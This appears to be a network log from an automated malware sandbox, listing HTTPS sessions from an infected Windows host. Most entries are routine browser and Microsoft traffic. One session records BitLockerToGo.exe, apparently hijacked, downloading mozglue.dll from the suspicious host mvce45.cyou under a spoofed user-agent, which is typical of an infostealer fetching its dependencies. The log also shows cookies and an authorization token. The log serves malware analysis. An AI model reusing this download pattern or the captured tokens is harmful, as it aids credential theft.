                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port
34 | 192.168.2.8 | 49803 | 40.126.53.18 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:40 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 4722
Host: login.live.com
2024-11-21 14:48:40 UTC | 4722 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 14:48:41 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Thu, 21 Nov 2024 14:47:40 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C516_BAY
x-ms-request-id: 1ab61bc4-c9b7-4486-91e3-ab9ecc223367
PPServer: PPV: 30 H: PH1PEPF0001B7FD V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Thu, 21 Nov 2024 14:48:40 GMT
Connection: close
Content-Length: 10197
2024-11-21 14:48:41 UTC | 10197 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49811 | 23.44.203.23 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:40 UTC | 628 | OUT | GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1
Host: assets2.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:41 UTC | 1239 | IN | HTTP/1.1 200 OK
Content-Type: application/javascript
Content-MD5: 2o3TH2IeNXyf9OP87xu6FA==
Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT
ETag: 0x8DD05C53565F83D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Thu, 21 Nov 2024 14:48:41 GMT
Transfer-Encoding: chunked
Connection: close
Connection: Transfer-Encoding
Alt-Svc: h3=":443"; ma=86400
Akamai-Request-BC: [a=23.195.36.241,b=420501333,c=g,n=US_NJ_SECAUCUS,o=20940]
Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
Akamai-Cache-Status: Hit from child
Akamai-Server-IP: 23.195.36.241
Akamai-Request-ID: 19105755
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
Cache-Control: public, no-transform, max-age=31535892
Timing-Allow-Origin: *
Akamai-GRN: 0.f124c317.1732200521.19105755
Vary: Origin
2024-11-21 14:48:41 UTC | 15145 | IN | Data Ascii: 00006000/*! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
2024-11-21 14:48:41 UTC | 9443 | IN | Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
2024-11-21 14:48:41 UTC | 16384 | IN | Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
2024-11-21 14:48:41 UTC | 8204 | IN
                                                                                                                                                                                                                                                                                                                  Data Ascii: e=l[t.charAt(o++)]<<18|l[t.charAt(o++)]<<12|(n=l[t.charAt(o++)])<<6|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC2479INData Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 00006000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s||0!==g?g:0,v&&Z=
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC8204INData Raw: 6e 3a 64 65 6c 65 74 65 20 74 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d
                                                                                                                                                                                                                                                                                                                  Data Ascii: n:delete t[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49807 | 13.107.246.63 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:41 UTC | 711 | OUT | GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
Host: edgeassetservice.azureedge.net
Connection: keep-alive
Edge-Asset-Group: EntityExtractionDomainsConfig
Sec-Mesh-Client-Edge-Version: 117.0.2045.47
Sec-Mesh-Client-Edge-Channel: stable
Sec-Mesh-Client-OS: Windows
Sec-Mesh-Client-OS-Version: 10.0.19045
Sec-Mesh-Client-Arch: x86_64
Sec-Mesh-Client-WebView: 0
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:42 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 14:48:41 GMT
Content-Type: application/octet-stream
Content-Length: 70207
Connection: close
Content-Encoding: gzip
Last-Modified: Thu, 21 Nov 2024 04:18:43 GMT
ETag: 0x8DD09E3961B864F
x-ms-request-id: f4d8a578-201e-0070-3324-3c1bc3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20241121T144841Z-178bfbc474bkvpdnhC1NYCuu2w00000001ng00000000ka5t
Cache-Control: public, max-age=604800
x-fd-int-roxy-purgeid: 69316365
X-Cache: TCP_MISS
Accept-Ranges: bytes


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  37192.168.2.84980613.107.246.634431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:42 UTC | 557 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:42 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 306698
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 4f59e955-701e-0005-6024-3c9c78000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144841Z-178bfbc474b7cbwqhC1NYC8z4n00000001m0000000006bdx
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49813 | 20.25.227.174 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:41 UTC | 723 | OUT | POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 746
                                                                                                                                                                                                                                                                                                                  Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                  Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiZ1BlWVREclJyM2hFcVlMdE9qYUtZUT09IiwgImhhc2giOiJOV0VBclZ2MHhGdz0ifQ==
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                  If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
2024-11-21 14:48:41 UTC | 746 | OUT | Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-21 14:48:42 UTC | 248 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:42 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 57
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                                                                                                                                                                  ETag: "638343870221005468"
                                                                                                                                                                                                                                                                                                                  Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 9murmur3,MhZ8\<&LiH[?m


Session ID | Source IP | Source Port | Destination IP | Destination Port
39 | 192.168.2.8 | 49812 | 40.126.53.18 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:42 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 4722
Host: login.live.com
2024-11-21 14:48:42 UTC | 4722 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 14:48:43 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Thu, 21 Nov 2024 14:47:42 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C516_BL2
x-ms-request-id: ac95cb7a-895e-490a-b46d-5f324a1f8ca5
PPServer: PPV: 30 H: BL02EPF0001D7C0 V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Thu, 21 Nov 2024 14:48:42 GMT
Connection: close
Content-Length: 10197
2024-11-21 14:48:43 UTC | 10197 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 49817 | 20.25.227.174 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:43 UTC | 698 | OUT | POST /api/browser/edge/data/settings/3 HTTP/1.1
Host: data-edge.smartscreen.microsoft.com
Connection: keep-alive
Content-Length: 746
Accept: application/octet-stream;application/x-patch-bsdiff;
Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiZ1BlWVREclJyM2hFcVlMdE9qYUtZUT09IiwgImhhc2giOiJOV0VBclZ2MHhGdz0ifQ==
Content-Type: application/json; charset=utf-8
If-None-Match: "2.0-0"
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
2024-11-21 14:48:43 UTC | 746 | OUT | Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-21 14:48:44 UTC | 302 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 14:48:43 GMT
Content-Type: application/octet-stream
Content-Length: 130439
Connection: close
Server: Kestrel
ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
2024-11-21 14:48:44 UTC | 16082 | IN | Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                                                                                                                  Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49814 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:43 UTC | 237 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:44 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:43 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 21-Nov-2024 14:48:43 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  42192.168.2.84981920.189.173.24431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC1017OUTPOST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-2.2.2&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732200512000&w=0&anoncknm=app_anon HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 4724
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=252611C791E3634C2B3C04F990FA6290; _EDGE_S=F=1&SID=13E45F7E6D0B6E511AE34A406C8E6FA4; _EDGE_V=1
2024-11-21 14:48:44 UTC | 4724 | OUT
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-11-21T14:48:32Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","data":{"baseData":{},"baseType":"MS.News.Web.Base","page":{"name":"default","product":"anaheim","type":"dhp","content":{"category":"stand
2024-11-21 14:48:44 UTC | 917 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Length: 153
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=9da112a96bf94f3cb2924374b3afc148&HASH=9da1&LV=202411&V=4&LU=1732200524671; Domain=.microsoft.com; Expires=Fri, 21 Nov 2025 14:48:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=374b8288fc0d479891d0f6bbcb381aa1; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 15:18:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 12671
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:44 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:44 UTC | 153 | IN
